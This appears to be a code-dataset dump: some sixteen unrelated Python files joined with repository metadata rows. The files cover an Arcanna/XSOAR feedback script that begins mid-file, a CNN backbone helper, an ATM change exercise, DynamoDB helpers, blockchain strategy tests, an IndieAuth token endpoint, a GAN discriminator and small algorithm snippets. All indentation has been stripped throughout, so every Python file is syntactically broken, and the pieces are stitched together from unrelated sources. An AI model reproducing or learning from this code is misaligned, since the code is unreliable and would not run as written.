def extract_feedback_information():
feedback_field = get_value_from_context(key="Arcanna.FeedbackField")
if type(feedback_field) == list and len(feedback_field) > 0:
feedback_field = feedback_field[0]
if not feedback_field:
raise Exception("Failed to get value for Arcanna closing field")
# Get Values from incident
feedback_field_value = demisto.incident().get(feedback_field, None)
if not feedback_field_value:
# if closing field value is Empty try to get it from Args as a fallback
feedback_field_value = demisto.args().get(feedback_field, None)
return feedback_field, feedback_field_value
def add_closing_user_information(closing_user, owner, survey_user):
if not closing_user:
if survey_user:
closing_user = survey_user
elif owner:
closing_user = owner
else:
closing_user = "dbot"
return closing_user
def run_arcanna_send_feedback():
try:
event_id = get_value_from_context(key="Arcanna.Event.event_id")
job_id = get_value_from_context(key="Arcanna.Event.job_id")
incident = demisto.incident()
run_status = incident.get("runStatus")
if run_status == "waiting":
return_error("Trying to close and incident without completing task")
incident_id = incident.get('id')
if not event_id:
demisto.debug("Trying to send feedback for an event which was not sent to Arcanna first.Skipping")
return_results(f'Skipping event feedback with id={incident_id}')
return
args_closing_reason = demisto.args().get("closing_reason", None)
if args_closing_reason:
user = demisto.args().get("closing_user", None)
notes = demisto.args().get("closing_notes", None)
ret = send_arcanna_feedback(notes, args_closing_reason, user, event_id, job_id)
return_results(ret)
else:
demisto.executeCommand("arcanna-get-feedback-field", {})
feedback_field, feedback_field_value = extract_feedback_information()
close_reason = incident.get('closeReason', None)
close_notes = incident.get('closeNotes')
owner = incident.get('owner', None)
closing_user = incident.get('closingUserId', None)
demisto.debug(f"Values supplied to command are{feedback_field} "
f"close_reason={close_reason} owner={owner} closing_user={closing_user} "
f"close_notes={close_notes}")
# if feedback_field_value is not empty get that value, else use the default closeReason value
if feedback_field_value:
close_reason = feedback_field_value
survey_user = get_value_from_context(key="Closure_Reason_Survey.Answers.name")
# Arcanna-Generic-Playbook usage.Prevent sending Arcanna Feedback if no analyst reviewed the incident
if str(close_notes).startswith(ARCANNA_AUTO_CLOSED_TICKET_PLAYBOOK_PLACEHOLDER):
return_results(
f'Skipping Sending Arcanna event feedback for incident_id={incident_id}.No Analyst Reviewed')
return
if not closing_user and not close_notes and not close_reason:
return_results(
f'Skipping Sending Arcanna event feedback for incident_id={incident_id}.No Analyst Reviewed')
return
if not close_reason:
raise Exception(
"Trying to use Arcanna post-processing script without providing value for the closing field")
closing_user = add_closing_user_information(closing_user, owner, survey_user)
ret = send_arcanna_feedback(close_notes, close_reason, closing_user, event_id, job_id)
return_results(ret)
except Exception as ex:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute ArcannaFeedbackPostProcessingScript. Error: {str(ex)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
run_arcanna_send_feedback()
| 40.193277 | 113 | 0.672381 |
f1cc3b2fba226f56954313dab2b6f19c75123cbc
| 819 |
py
|
Python
|
modeling/model_utils/backbone2head.py
|
UESTC-Liuxin/SkmtSeg
|
1251de57fae967aca395644d1c70a9ba0bb52271
|
[
"Apache-2.0"
] | 2 |
2020-12-22T08:40:05.000Z
|
2021-03-30T08:09:44.000Z
|
modeling/model_utils/backbone2head.py
|
UESTC-Liuxin/SkmtSeg
|
1251de57fae967aca395644d1c70a9ba0bb52271
|
[
"Apache-2.0"
] | null | null | null |
modeling/model_utils/backbone2head.py
|
UESTC-Liuxin/SkmtSeg
|
1251de57fae967aca395644d1c70a9ba0bb52271
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
@description:
@author: LiuXin
@contact: [email protected]
@Created on: 2020/12/30 下午4:16
"""
def get_inchannels(backbone):
"""
:return:
"""
if (backbone in ['resnet18', 'resnet34', 'resnet50', 'resnet101',
'resnext50_32x4d', 'wide_resnet50_2', 'wide_resnet101_2']):
in_channels = [2048,1024, 512, 256,64]
elif backbone == 'mobilenet':
in_channels = [320, 32, 24, 16]
else:
raise NotImplementedError
return in_channels
def get_low_level_feat(backbone,inputs):
if (backbone == 'xception'): # 不同的backbone有不同的输出,处理不同
low_level_feat = inputs[1]
elif (backbone in ['resnet50', 'resnet101','wide_resnet50_2']):
low_level_feat = inputs[3]
else:
NotImplementedError
return low_level_feat
| 23.4 | 70 | 0.632479 |
8d17a70c6a50bfa1882bef0d2c971669ab7dd61f
| 788 |
py
|
Python
|
Curso-Em-Video-Python/2Exercicios/071_Simulador_de_caixa_eletronico.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
Curso-Em-Video-Python/2Exercicios/071_Simulador_de_caixa_eletronico.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
Curso-Em-Video-Python/2Exercicios/071_Simulador_de_caixa_eletronico.py
|
pedrohd21/Cursos-Feitos
|
b223aad83867bfa45ad161d133e33c2c200d42bd
|
[
"MIT"
] | null | null | null |
titulo = 'BANC Actuli'
print('='*40)
print(titulo.center(40))
print('='*40)
saque = int(input('Qual o valor a sacar? R$'))
n = nota = nota1 = nota20 = nota50 = nota10 = 0
while n < 2:
if saque >= 50:
nota= saque // 50
nota50 += 1
saque -= 50
elif saque >= 20:
nota = saque // 20
nota20 += 1
saque -= 20
elif saque >= 10:
nota = saque // 10
nota10 += 1
saque -= 10
else:
nota = saque // 1
saque -= 1
nota1 += 1
if saque == 0:
break
print(f'Total de {nota50} cédulas de R$ 50')
print(f'Total de {nota20} cédulas de R$ 20')
print(f'Total de {nota10} cédulas de R$ 10')
print(f'Total de {nota1} cédulas de R$ 1')
print('='*40)
print('Volte Sempre ao Banc Actuali!!')
| 23.878788 | 47 | 0.530457 |
a5e067b4890b4317639f81e7612be10d175e1883
| 395 |
py
|
Python
|
python/contextlib/contextlib_exitstack_callbacks.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/contextlib/contextlib_exitstack_callbacks.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/contextlib/contextlib_exitstack_callbacks.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
"""
ExitStack also supports arbitrary callbacks for closing a context,
making it easy to clean up resources that are not controlled via a
context manager
"""
import contextlib
def callback(*args, **kwargs):
print('closing callback({}, {})'.format(args, kwargs))
with contextlib.ExitStack() as stack:
stack.callback(callback, 'arg1', 'arg2')
stack.callback(callback, arg3='val3')
| 24.6875 | 66 | 0.724051 |
a5f2622b2579f3d9c0c1aea05dd3d5fae58ede28
| 515 |
pyde
|
Python
|
sketches/primespiral/primespiral.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/primespiral/primespiral.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/primespiral/primespiral.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
p = 2
f = 1
MAXITER = 60000
def setup():
size(600, 600)
this.surface.setTitle("Primzahl-Spirale")
background(51)
frameRate(1000)
def draw():
colorMode(HSB)
global p, f, i
translate(width/2, height/2)
noStroke()
fill(p%255, 255, 255)
# Satz von Wilson
if f%p%2:
x = p*sin(p)*0.005
y = p*cos(p)*0.005
ellipse(x, y, 2, 2)
p += 1
f *= (p-2)
if p > MAXITER:
print("I did it, Babe!")
noLoop()
| 17.758621 | 45 | 0.485437 |
9e018187e85f7ee1e34428212b0e780da0574e36
| 832 |
py
|
Python
|
skill/db.py
|
Lanseuo/luftdaten-skill
|
4d11a80d627d86b5afcd8a9ae1d7ccac3659b35a
|
[
"MIT"
] | 1 |
2019-03-25T07:18:13.000Z
|
2019-03-25T07:18:13.000Z
|
skill/db.py
|
Lanseuo/luftdaten-skill
|
4d11a80d627d86b5afcd8a9ae1d7ccac3659b35a
|
[
"MIT"
] | null | null | null |
skill/db.py
|
Lanseuo/luftdaten-skill
|
4d11a80d627d86b5afcd8a9ae1d7ccac3659b35a
|
[
"MIT"
] | null | null | null |
import boto3
def get_user(user_id):
dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("luftdaten-skill-users")
result = table.get_item(
Key={
"user_id": user_id
}
)
return result.get("Item")
def add_user(user_id):
dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("luftdaten-skill-users")
table.put_item(
Item={
"user_id": user_id
}
)
def set_sensor_id(user_id, sensor_id):
dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("luftdaten-skill-users")
table.update_item(
Key={
"user_id": user_id
},
UpdateExpression="set sensor_id=:s",
ExpressionAttributeValues={
":s": sensor_id
},
ReturnValues="UPDATED_NEW"
)
| 19.809524 | 51 | 0.580529 |
5fe5e49621d153a96d132abc8d6685390aaa592c
| 433 |
py
|
Python
|
envs/rpg/entities/spike.py
|
etigerstudio/zilong-on-fire
|
5144a471b2d39ea38a47d394e648de00dd13cd8b
|
[
"MIT"
] | 2 |
2021-01-07T01:10:49.000Z
|
2022-01-21T09:37:16.000Z
|
envs/rpg/entities/spike.py
|
etigerstudio/zilong-on-fire
|
5144a471b2d39ea38a47d394e648de00dd13cd8b
|
[
"MIT"
] | null | null | null |
envs/rpg/entities/spike.py
|
etigerstudio/zilong-on-fire
|
5144a471b2d39ea38a47d394e648de00dd13cd8b
|
[
"MIT"
] | null | null | null |
from envs.rpg.entity import Entity
class Spike(Entity):
REPRESENTATION = 1
SPIKE_REWARD = -1
def start(self, world):
pass
def update(self, world):
actor = world.get_actor_entity()
if not actor.pose == actor.Pose.JUMPING and \
actor.position == self.position:
actor.destroy(world)
return self.SPIKE_REWARD
def destroy(self, world):
pass
| 21.65 | 53 | 0.595843 |
27d0a39f208253da9f3ee353f6c6404d09729caf
| 738 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/education/doctype/student_group/test_student_group.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/education/doctype/student_group/test_student_group.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/education/doctype/student_group/test_student_group.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
from frappe.utils.make_random import get_random
class TestStudentGroup(unittest.TestCase):
def test_student_roll_no(self):
doc = frappe.get_doc({
"doctype": "Student Group",
"student_group_name": "_Test Student Group R",
"group_based_on": "Activity"
}).insert()
student_list = []
while len(student_list) < 3:
s = get_random("Student")
if s not in student_list:
student_list.append(s)
doc.extend("students", [{"student":d} for d in student_list])
doc.save()
self.assertEqual(max([d.group_roll_number for d in doc.students]), 3)
| 26.357143 | 71 | 0.719512 |
8b4c11b2fd015278e60cce1ac7e834bd64716946
| 477 |
py
|
Python
|
src/bo4e/enum/tarifart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 1 |
2022-03-02T12:49:44.000Z
|
2022-03-02T12:49:44.000Z
|
src/bo4e/enum/tarifart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 21 |
2022-02-04T07:38:46.000Z
|
2022-03-28T14:01:53.000Z
|
src/bo4e/enum/tarifart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | null | null | null |
# pylint:disable=missing-module-docstring
from bo4e.enum.strenum import StrEnum
class Tarifart(StrEnum):
"""
Die Tarifart wird verwendet zur Charakterisierung von Zählern und daraus resultierenden Tarifen.
"""
EINTARIF = "EINTARIF" #: Eintarif
ZWEITARIF = "ZWEITARIF" #: Zweitarif
MEHRTARIF = "MEHRTARIF" #: Mehrtarif
SMART_METER = "SMART_METER" #: Smart Meter Tarif
LEISTUNGSGEMESSEN = "LEISTUNGSGEMESSEN" #: Leistungsgemessener Tarif
| 29.8125 | 100 | 0.721174 |
9a681c609cbc0159e7e33c8e7411b5bb4af609f4
| 6,909 |
py
|
Python
|
code/tests/test_executor.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/tests/test_executor.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/tests/test_executor.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | 1 |
2019-06-05T09:10:30.000Z
|
2019-06-05T09:10:30.000Z
|
import unittest
from mock import MagicMock
from chain import Block
import test_util
from strategy import BlockOrigin, Action, ActionException
from strategy.executor import Executor
from bitcoin.core import CBlock
class ExecutorTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(ExecutorTest, self).__init__(*args, **kwargs)
self.executor = None
self.networking = None
self.first_block_chain_a = None
self.second_block_chain_a = None
self.first_block_chain_b = None
self.second_block_chain_b = None
def setUp(self):
self.networking = MagicMock()
self.executor = Executor(self.networking)
self.first_block_chain_b = Block(CBlock(), BlockOrigin.public)
self.first_block_chain_b.height = 1
self.first_block_chain_b.prevBlock = test_util.genesis_block
self.first_block_chain_b.cached_hash = '1b'
self.second_block_chain_b = Block(CBlock(), BlockOrigin.public)
self.second_block_chain_b.height = 2
self.second_block_chain_b.prevBlock = self.first_block_chain_b
self.second_block_chain_b.cached_hash = '2b'
self.first_block_chain_a = Block(CBlock(), BlockOrigin.private)
self.first_block_chain_a.height = 1
self.first_block_chain_a.prevBlock = test_util.genesis_block
self.first_block_chain_a.cached_hash = '1a'
self.second_block_chain_a = Block(CBlock(), BlockOrigin.private)
self.second_block_chain_a.height = 2
self.second_block_chain_a.prevBlock = self.first_block_chain_a
self.second_block_chain_a.cached_hash = '2a'
def test_match_same_height(self):
self.executor.execute(Action.match, self.first_block_chain_a, self.first_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 2)
self.assertTrue('1a' in blocks)
self.assertTrue('1b' in blocks)
def test_match_lead_private(self):
self.executor.execute(Action.match, self.second_block_chain_a, self.first_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 2)
self.assertTrue('1a' in blocks)
self.assertTrue('1b' in blocks)
def test_match_lead_public(self):
private_tip = Block(CBlock(), None)
private_tip.height = 1
public_tip = Block(CBlock(), None)
public_tip.height = 2
with self.assertRaisesRegexp(ActionException, "private tip.*must >= then public tip.*match.*"):
self.executor.execute(Action.match, private_tip, public_tip)
def test_override_lead_public(self):
private_tip = Block(CBlock(), None)
private_tip.height = 1
public_tip = Block(CBlock(), None)
public_tip.height = 2
with self.assertRaisesRegexp(ActionException, "private tip.*must > then public tip.*override.*"):
self.executor.execute(Action.override, private_tip, public_tip)
def test_override_same_height(self):
private_tip = Block(CBlock(), None)
private_tip.height = 2
public_tip = Block(CBlock(), None)
public_tip.height = 2
with self.assertRaisesRegexp(ActionException, "private tip.*must > then public tip.*override.*"):
self.executor.execute(Action.override, private_tip, public_tip)
def test_override_lead_private(self):
self.executor.execute(Action.override, self.second_block_chain_a, self.first_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 3)
self.assertTrue('1a' in blocks)
self.assertTrue('2a' in blocks)
self.assertTrue('1b' in blocks)
def test_override_two_blocks_lead_private(self):
third_block_chain_a = Block(CBlock(), BlockOrigin.private)
third_block_chain_a.height = 3
third_block_chain_a.prevBlock = self.second_block_chain_a
third_block_chain_a.cached_hash = '3a'
self.executor.execute(Action.override, third_block_chain_a, self.first_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 3)
self.assertTrue('1a' in blocks)
self.assertTrue('2a' in blocks)
self.assertTrue('1b' in blocks)
def test_adopt_private_lead(self):
private_tip = Block(CBlock(), None)
private_tip.height = 3
public_tip = Block(CBlock(), None)
public_tip.height = 2
with self.assertRaisesRegexp(ActionException, "public tip.*must > then private tip.*adopt.*"):
self.executor.execute(Action.adopt, private_tip, public_tip)
def test_adopt_same_height(self):
private_tip = Block(CBlock(), None)
private_tip.height = 2
public_tip = Block(CBlock(), None)
public_tip.height = 2
with self.assertRaisesRegexp(ActionException, "public tip.*must > then private tip.*adopt.*"):
self.executor.execute(Action.adopt, private_tip, public_tip)
def test_adopt_lead_public(self):
self.executor.execute(Action.adopt, self.first_block_chain_a, self.second_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 2)
self.assertTrue('1b' in blocks)
self.assertTrue('2b' in blocks)
def test_adopt_two_blocks_lead_public(self):
third_block_chain_b = Block(CBlock(), BlockOrigin.public)
third_block_chain_b.height = 3
third_block_chain_b.prevBlock = self.second_block_chain_b
third_block_chain_b.cached_hash = '3b'
self.executor.execute(Action.adopt, self.first_block_chain_a, third_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
blocks = [block.hash() for block in self.networking.send_inv.call_args[0][0]]
self.assertEqual(len(blocks), 3)
self.assertTrue('1b' in blocks)
self.assertTrue('2b' in blocks)
self.assertTrue('3b' in blocks)
def test_execute_action_check_if_transfer_allowed_is_set(self):
self.executor.execute(Action.match, self.first_block_chain_a, self.first_block_chain_b)
self.assertTrue(self.networking.send_inv.called)
self.assertEqual(len(self.networking.send_inv.call_args[0][0]), 2)
for block in self.networking.send_inv.call_args[0][0]:
self.assertTrue(block.transfer_allowed)
| 37.754098 | 105 | 0.694312 |
d059add8381fa878a349fe53f182a26ba2c75c1b
| 2,544 |
py
|
Python
|
Problems/Depth-First Search/medium/pseudoPalindromicPathsBT/pseudo_palindromic_paths_bt.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | 1 |
2021-08-16T14:52:05.000Z
|
2021-08-16T14:52:05.000Z
|
Problems/Depth-First Search/medium/pseudoPalindromicPathsBT/pseudo_palindromic_paths_bt.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
Problems/Depth-First Search/medium/pseudoPalindromicPathsBT/pseudo_palindromic_paths_bt.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
from typing import Optional
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
def pseudoPalindromicPaths(self, root: Optional[TreeNode]) -> int:
self.dict_freq = defaultdict(int)
self.Pal, self.Res = 0, 0
def dfs(cur_node: Optional[TreeNode]):
if not cur_node:
return
cur, pal = self.dict_freq[cur_node.val], self.Pal
self.Pal = self.Pal - 1 if cur == 1 else self.Pal + 1
self.dict_freq[cur_node.val] = (cur + 1) % 2
if not cur_node.left and not cur_node.right and self.Pal <= 1:
self.Res += 1
dfs(cur_node.left)
dfs(cur_node.right)
self.Pal, self.dict_freq[cur_node.val] = pal, cur
dfs(root)
return self.Res
# Recursive bitwise
# def pseudoPalindromicPaths(self, root: Optional[TreeNode]) -> int:
# self.ans = 0
#
# def dfs(cur_node: Optional[TreeNode], path: int):
#
# path ^= (1 << cur_node.val)
#
# if not cur_node.left and not cur_node.right:
# self.ans += path & (path - 1) == 0
#
# if cur_node.left:
# dfs(cur_node.left, path)
#
# if cur_node.right:
# dfs(cur_node.right, path)
#
# dfs(root, 0)
#
# return self.ans
# Iterative bitwise
# def pseudoPalindromicPaths(self, root: Optional[TreeNode]) -> int:
# ans = 0
#
# stack = [(root, 0)]
# while stack:
# cur_node, path = stack.pop()
# path ^= (1 << cur_node.val)
# if not cur_node.left and not cur_node.right:
# ans += path & (path - 1) == 0
# continue
#
# if cur_node.left:
# stack.append((cur_node.left, path))
#
# if cur_node.right:
# stack.append((cur_node.right, path))
#
# return ans
# Using set
# def pseudoPalindromicPaths(self, root: Optional[TreeNode]) -> int:
# self.ans = 0
#
# def dfs(cur_node, path_set=set()):
# paths = copy.deepcopy(path_set)
# if cur_node.val in paths:
# paths.remove(cur_node.val)
# else:
# paths.add(cur_node.val)
#
# if not cur_node.left and not cur_node.right:
# self.ans += len(paths) <= 1
# return
#
# if cur_node.left:
# dfs(cur_node.left, paths)
#
# if cur_node.right:
# dfs(cur_node.right, paths)
#
# dfs(root)
#
# return self.ans
| 25.44 | 70 | 0.564072 |
d0b3f810f96e7869495cccef7980d54e19b6a8a1
| 4,878 |
py
|
Python
|
publ/tokens.py
|
PlaidWeb/Publ
|
67efc5e32bf25dbac72a83d1167de038b79db5a7
|
[
"MIT"
] | 27 |
2018-11-30T21:32:26.000Z
|
2022-03-20T19:46:25.000Z
|
publ/tokens.py
|
PlaidWeb/Publ
|
67efc5e32bf25dbac72a83d1167de038b79db5a7
|
[
"MIT"
] | 249 |
2018-09-30T07:04:37.000Z
|
2022-03-29T04:31:00.000Z
|
publ/tokens.py
|
PlaidWeb/Publ
|
67efc5e32bf25dbac72a83d1167de038b79db5a7
|
[
"MIT"
] | 4 |
2019-03-01T06:46:13.000Z
|
2019-06-30T17:45:46.000Z
|
""" IndieAuth token endpoint """
import json
import logging
import time
import typing
import flask
import itsdangerous
import requests
import werkzeug.exceptions as http_error
from .config import config
LOGGER = logging.getLogger(__name__)
def signer():
""" Gets the signer/validator for the tokens """
return itsdangerous.URLSafeSerializer(flask.current_app.secret_key)
def get_token(id_url: str, lifetime: int, scope: str = None) -> str:
""" Gets a signed token for the given identity"""
token = {'me': id_url}
if scope:
token['scope'] = scope
return signer().dumps((token, int(time.time() + lifetime)))
def parse_token(token: str) -> typing.Dict[str, str]:
""" Parse a bearer token to get the stored data """
try:
ident, expires = signer().loads(token)
except itsdangerous.BadData as error:
LOGGER.error("Got token parse error: %s", error)
flask.g.token_error = 'Invalid token'
raise http_error.Unauthorized('Invalid token') from error
if expires < time.time():
LOGGER.info("Got expired token for %s", ident['me'])
flask.g.token_error = "Token expired"
raise http_error.Unauthorized("Token expired")
return ident
def request(user):
""" Called whenever an authenticated access fails; marks authentication
as being upgradeable.
Currently this is unused by Publ itself, but a site can make use of it to
e.g. add a ``WWW-Authenticate`` header or the like in a post-request hook.
"""
if not user:
flask.g.needs_auth = True
def send_auth_ticket(subject: str,
resource: str,
endpoint: str,
scope: str = None):
""" Initiate the TicketAuth flow """
def _submit():
scopes = set(scope.split() if scope else [])
scopes.add('ticket')
ticket = get_token(subject, config.ticket_lifetime, ' '.join(scopes))
req = requests.post(endpoint, data={
'ticket': ticket,
'resource': resource,
'subject': subject
})
LOGGER.info("Auth ticket sent to %s for %s: %d %s",
endpoint, subject, req.status_code, req.text)
# Use the indexer's threadpool to issue the ticket in the background
flask.current_app.indexer.submit(_submit)
def indieauth_endpoint():
""" IndieAuth token endpoint """
import authl.handlers.indieauth
if 'me' in flask.request.args:
# A ticket request is being made
me_url = flask.request.args['me']
try:
endpoint, _ = authl.handlers.indieauth.find_endpoint(me_url,
rel='ticket_endpoint')
except RuntimeError:
endpoint = None
if not endpoint:
raise http_error.BadRequest("Could not get ticket endpoint")
LOGGER.info("endpoint: %s", endpoint)
send_auth_ticket(me_url, flask.request.url_root, endpoint)
return "Ticket sent", 202
if 'grant_type' in flask.request.form:
# token grant
if flask.request.form['grant_type'] == 'ticket':
# TicketAuth
if 'ticket' not in flask.request.form:
raise http_error.BadRequest("Missing ticket")
ticket = parse_token(flask.request.form['ticket'])
LOGGER.info("Redeeming ticket for %s; scopes=%s", ticket['me'],
ticket['scope'])
scopes = set(ticket.get('scope', '').split())
if 'ticket' not in scopes:
raise http_error.BadRequest("Missing 'ticket' scope")
scopes.remove('ticket')
scope = ' '.join(scopes)
token = get_token(ticket['me'], config.token_lifetime, scope)
response = {
'access_token': token,
'token_type': 'Bearer',
'me': ticket['me'],
'expires_in': config.token_lifetime,
'refresh_token': get_token(ticket['me'],
config.token_lifetime,
ticket['scope'])
}
if scope:
response['scope'] = scope
return json.dumps(response), {'Content-Type': 'application/json'}
raise http_error.BadRequest("Unknown grant type")
if 'action' in flask.request.form:
raise http_error.BadRequest()
if 'Authorization' in flask.request.headers:
# ticket verification
parts = flask.request.headers['Authorization'].split()
if parts[0].lower() == 'bearer':
token = parse_token(parts[1])
return json.dumps(token), {'Content-Type': 'application/json'}
raise http_error.Unauthorized("Invalid authorization header")
raise http_error.BadRequest()
| 32.738255 | 87 | 0.590816 |
d0f919ad9cfe633b4feb6fd20132a3b2590ac918
| 928 |
py
|
Python
|
7_DeepLearning-GANs/02_DCGAN/Discriminator.py
|
felixdittrich92/DeepLearning-tensorflow-keras
|
2880d8ed28ba87f28851affa92b6fa99d2e47be9
|
[
"Apache-2.0"
] | null | null | null |
7_DeepLearning-GANs/02_DCGAN/Discriminator.py
|
felixdittrich92/DeepLearning-tensorflow-keras
|
2880d8ed28ba87f28851affa92b6fa99d2e47be9
|
[
"Apache-2.0"
] | null | null | null |
7_DeepLearning-GANs/02_DCGAN/Discriminator.py
|
felixdittrich92/DeepLearning-tensorflow-keras
|
2880d8ed28ba87f28851affa92b6fa99d2e47be9
|
[
"Apache-2.0"
] | null | null | null |
'''
Discriminator - bewertet die vom Generator erzeugten Bilder ob Real oder Fake
'''
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import *
from tensorflow.keras.optimizers import *
def build_discriminator(img_shape):
model = Sequential() #28x28
model.add(Conv2D(64, kernel_size=5, strides=2, input_shape=img_shape, padding="same")) #14x14
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.3))
model.add(Conv2D(128, (5, 5), strides=(2, 2), padding='same'))
model.add(LeakyReLU())
model.add(Dropout(0.3))
model.add(Flatten()) #4x4x256 => 16 x 256 = 2^4 x 2^8 = 2^12 = 4096
model.add(Dense(1))
model.add(Activation("sigmoid")) # < 0.5 Klasse 0 > 0.5 Klasse 1
model.summary()
img = Input(shape=img_shape)
d_pred = model(img) # model auf bild aufrufen
return Model(inputs=img, outputs=d_pred) # beeinhaltet komplettes Modell
| 34.37037 | 97 | 0.688578 |
f5df78ca1be55fa27098e6eff282bddb6a88e868
| 1,606 |
py
|
Python
|
tssb/tssb.py
|
sharadmv/tssb
|
9385ea9ab199070034a36f92b6520152f801823a
|
[
"MIT"
] | null | null | null |
tssb/tssb.py
|
sharadmv/tssb
|
9385ea9ab199070034a36f92b6520152f801823a
|
[
"MIT"
] | null | null | null |
tssb/tssb.py
|
sharadmv/tssb
|
9385ea9ab199070034a36f92b6520152f801823a
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.stats as stats
from dist import Distribution
from gem import LazyGEM
def depth_weight(a, l):
def dpw(j):
return l ** j * a
return dpw
class TSSB(Distribution):
def __init__(self, index=(), depth=0, alpha=depth_weight(1.0, 0.5), gamma=0.2):
self.index = index
self.depth = depth
self.alpha = alpha
self.gamma = gamma
self.nu = stats.beta(1, self.alpha(self.depth)).rvs()
self.psi = LazyGEM(self.gamma)
self.children = []
self.cur_index = -1
def get_child(self, key):
if self.cur_index < key:
while self.cur_index < key:
self.cur_index += 1
self.children.append(TSSB(
index=self.index + (self.cur_index,),
depth=self.depth + 1,
alpha=self.alpha,
gamma=self.gamma
))
return self.children[key]
def uniform_index(self, u):
if u < self.nu:
return self.index
u = (u - self.nu) / (1.0 - self.nu)
i, right_weight = self.psi.uniform_index(u)
child, weight = self.get_child(i), self.psi[i]
left_weight = right_weight - weight
u = (u - left_weight) / (weight)
return child.uniform_index(u)
def sample_one(self):
return self.uniform_index(np.random.random())
def __repr__(self):
if self.index:
return '-'.join(map(str, self.index))
return '-'
if __name__ == "__main__":
t = TSSB(alpha=depth_weight(1, 1), gamma=1)
| 28.678571 | 83 | 0.552927 |
de2575a582c58f8fcfcec0a91bd84c250eee87cd
| 250 |
py
|
Python
|
Python/Courses/Python-Tutorials.Telusko/00.Fundamentals/07.06-for-Loop-Over-Dictionary.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/00.Fundamentals/07.06-for-Loop-Over-Dictionary.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/00.Fundamentals/07.06-for-Loop-Over-Dictionary.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
dt = {"shihab": "programmer", "mahinur": "graphic designer", "jion": "civil engineer"}
for i in dt:
print(i, end=" ")
print()
for pro in dt.values():
print(pro, end=" ")
print("\n")
for i, pro in dt.items():
print(i,": ", pro)
